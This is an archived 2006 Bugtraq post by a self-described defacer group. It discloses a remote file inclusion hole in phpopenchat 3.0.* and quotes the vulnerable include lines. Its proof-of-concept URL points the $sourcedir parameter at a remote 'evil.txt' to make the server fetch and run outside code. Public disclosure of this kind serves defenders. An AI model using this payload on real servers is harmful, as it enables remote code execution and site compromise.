| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 6 Sep 2006 19:17:11 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
[W]orld [D]efacers Team
--------------------Summary----------------
eVuln ID: WD23
Vendor: phpopenchat-3.0.*
Vendor's Web Site: http://phpopenchat.org
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )
-----------------Description---------------
include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");
--------------PoC/Exploit----------------------
http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
Powered by blists - more mailing lists